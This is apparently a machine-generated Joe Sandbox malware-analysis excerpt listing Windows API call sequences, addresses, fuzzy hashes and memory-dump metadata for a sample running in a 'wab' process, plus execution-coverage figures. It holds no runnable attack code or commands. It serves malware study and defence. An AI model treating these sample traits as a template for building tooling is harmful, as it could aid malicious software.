                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                            • _snwprintf.MSVCRT ref: 00410FE1
                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • _snwprintf.MSVCRT ref: 0041100C
                                            • wcscat.MSVCRT ref: 0041101F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                            • String ID:
                                            • API String ID: 822687973-0
                                            • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                            • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                            • malloc.MSVCRT ref: 00417459
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$??3@malloc
                                            • String ID:
                                            • API String ID: 4284152360-0
                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                            • RegisterClassW.USER32(?), ref: 00412428
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                            • String ID:
                                            • API String ID: 2678498856-0
                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: MessageSend$Item
                                            • String ID:
                                            • API String ID: 3888421826-0
                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                            APIs
                                            • memset.MSVCRT ref: 00417B7B
                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                            • GetLastError.KERNEL32 ref: 00417BB5
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$ErrorLastLockUnlockmemset
                                            • String ID:
                                            • API String ID: 3727323765-0
                                            • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                            • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                            • malloc.MSVCRT ref: 00417407
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                            • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$??3@malloc
                                            • String ID:
                                            • API String ID: 4284152360-0
                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                            APIs
                                            • memset.MSVCRT ref: 0040F673
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                            • strlen.MSVCRT ref: 0040F6A2
                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
                                            • API String ID: 2754987064-0
                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                            APIs
                                            • memset.MSVCRT ref: 0040F6E2
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                            • strlen.MSVCRT ref: 0040F70D
                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
                                            • API String ID: 2754987064-0
                                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                            APIs
                                            • memset.MSVCRT ref: 00402FD7
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                            • strlen.MSVCRT ref: 00403006
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
                                            • API String ID: 2754987064-0
                                            • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                            • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                            APIs
                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                            • String ID:
                                            • API String ID: 764393265-0
                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                            APIs
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Time$System$File$LocalSpecific
                                            • String ID:
                                            • API String ID: 979780441-0
                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                            APIs
                                            • memcpy.MSVCRT ref: 004134E0
                                            • memcpy.MSVCRT ref: 004134F2
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$DialogHandleModuleParam
                                            • String ID:
                                            • API String ID: 1386444988-0
                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                            APIs
                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: InvalidateMessageRectSend
                                            • String ID: d=E
                                            • API String ID: 909852535-3703654223
                                            • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                            • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                            APIs
                                            • wcschr.MSVCRT ref: 0040F79E
                                            • wcschr.MSVCRT ref: 0040F7AC
                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcschr$memcpywcslen
                                            • String ID: "
                                            • API String ID: 1983396471-123907689
                                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                            APIs
                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                            • _memicmp.MSVCRT ref: 0040C00D
                                            • memcpy.MSVCRT ref: 0040C024
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FilePointer_memicmpmemcpy
                                            • String ID: URL
                                            • API String ID: 2108176848-3574463123
                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _snwprintfmemcpy
                                            • String ID: %2.2X
                                            • API String ID: 2789212964-323797159
                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _snwprintf
                                            • String ID: %%-%d.%ds
                                            • API String ID: 3988819677-2008345750
                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                            APIs
                                            • memset.MSVCRT ref: 0040E770
                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: MessageSendmemset
                                            • String ID: F^@
                                            • API String ID: 568519121-3652327722
                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PlacementWindowmemset
                                            • String ID: WinPos
                                            • API String ID: 4036792311-2823255486
                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                            APIs
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                            • wcscat.MSVCRT ref: 0040DCFF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FileModuleNamewcscatwcsrchr
                                            • String ID: _lng.ini
                                            • API String ID: 383090722-1948609170
                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                            • API String ID: 2773794195-880857682
                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID:
                                            • API String ID: 438689982-0
                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@$memset
                                            • String ID:
                                            • API String ID: 1860491036-0
                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                            APIs
                                            • memcmp.MSVCRT ref: 00408AF3
                                              • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                              • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                              • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                            • memcmp.MSVCRT ref: 00408B2B
                                            • memcmp.MSVCRT ref: 00408B5C
                                            • memcpy.MSVCRT ref: 00408B79
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcmp$memcpy
                                            • String ID:
                                            • API String ID: 231171946-0
                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcslen$wcscat$wcscpy
                                            • String ID:
                                            • API String ID: 1961120804-0
                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                            Execution Graph

                                            Execution Coverage:2.4%
                                            Dynamic/Decrypted Code Coverage:20.4%
                                            Signature Coverage:0.5%
                                            Total number of Nodes:843
                                            Total number of Limit Nodes:16
